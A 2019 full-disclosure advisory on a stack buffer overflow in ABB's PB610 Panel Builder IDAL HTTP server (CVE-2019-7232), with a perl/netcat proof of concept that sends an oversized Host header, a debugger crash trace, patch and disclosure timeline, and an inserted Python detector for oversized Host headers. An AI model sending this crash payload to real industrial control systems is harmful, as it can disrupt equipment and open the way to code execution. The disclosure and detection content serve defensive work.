
List:       full-disclosure
Subject:    [FD] XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
From:       xen1thLabs <xen1thLabs () darkmatter ! ae>
Date:       2019-06-20 12:13:49
Message-ID: 6e86abcb86744d939f91742bbae4d977 () darkmatter ! ae

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-011
CVE-2019-7232
ABBVU-IAMF-1902009


CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Affected vendor
---------------
ABB (new.abb.com)


Credit
------
Eldar Marcussen - xen1thLabs - Software Labs


Vulnerability summary
---------------------
The IDAL HTTP server is vulnerable to a stack-based buffer overflow when it receives an oversized Host header in an HTTP request. The Host header value overflows a fixed-size stack buffer and, when long enough, overwrites the Structured Exception Handler (SEH) address.


Technical details
-----------------
An unauthenticated attacker can send a Host header value of 2047 bytes or more to overflow the Host header buffer and overwrite the SEH address, which can then be leveraged to execute attacker-controlled code on the server.

Proof of concept
----------------
```
perl -e 'print "GET / HTTP/1.1\r\nHost: " . "A" x 2047 . "\r\n\r\n";' | nc targetip 81
```

    STATUS_STACK_BUFFER_OVERRUN encountered
    (1734.510): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=1032cc34 ecx=762dd018 edx=05b8e4c9 esi=00000000 edi=05b8eec3
    eip=762dce95 esp=05b8e710 ebp=05b8e78c iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
    kernel32!SetThreadExecutionState+0x134b0:
    762dce95 cc int 3
    0:032> !exchain
    05b8e77c: kernel32!RegSaveKeyExW+3b9 (76309332)
    Invalid exception stack at 41414141
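Added example, not part of the advisory or ABB's code: a defensive check that parses the header block of a raw HTTP request, measures the Host header value (including folded continuation lines and case variants of the header name) and flags any request reaching the 2047-byte trigger length described above. The sample requests and the threshold constant are constructed here for illustration.

```python
"""Flag HTTP requests whose Host header reaches the overflow trigger length.

Added example for the XL-19-011 advisory; threshold and sample requests are
assumptions constructed for illustration, not captured traffic."""

# Trigger length from the advisory: a Host header value of 2047 bytes or more.
HOST_LEN_THRESHOLD = 2047


def parse_headers(raw: bytes) -> dict:
    """Parse the header block of a raw request into {name_lower: [values]}.

    Header names are compared case-insensitively and obs-fold continuation
    lines (leading SP/HTAB) are joined onto the previous value, so a folded
    Host header is measured as one value rather than being missed."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers: dict = {}
    last = None
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        if line[:1] in (b" ", b"\t") and last is not None:
            headers[last][-1] += b" " + line.strip()   # obs-fold continuation
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            continue                               # malformed line, ignore
        last = name.strip().lower()
        headers.setdefault(last, []).append(value.strip())
    return headers


def host_header_length(raw: bytes) -> int:
    """Return the byte length of the longest Host header value (0 if absent)."""
    values = parse_headers(raw).get(b"host", [])
    return max((len(v) for v in values), default=0)


def is_oversized_host(raw: bytes, threshold: int = HOST_LEN_THRESHOLD) -> bool:
    """True when the request's Host header reaches the trigger length."""
    return host_header_length(raw) >= threshold


# Constructed sample requests (not captured traffic).
BENIGN = b"GET / HTTP/1.1\r\nHost: panel.example.internal:81\r\n\r\n"
OVERSIZED = b"GET / HTTP/1.1\r\nHost: " + b"A" * 2047 + b"\r\n\r\n"
FOLDED = (b"GET / HTTP/1.1\r\nhOsT: " + b"A" * 1500
          + b"\r\n " + b"A" * 600 + b"\r\n\r\n")   # 1500 + 1 + 600 = 2101 bytes

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("oversized", OVERSIZED), ("folded", FOLDED)):
        print(label, host_header_length(req), is_oversized_host(req))
```

The same check can sit in a reverse proxy or IDS rule in front of port 81, where rejecting oversized Host headers blocks the trigger without touching the panel software.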


Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367


Solution
--------
Apply the patches and instructions from the vendor:
  - ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch



Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

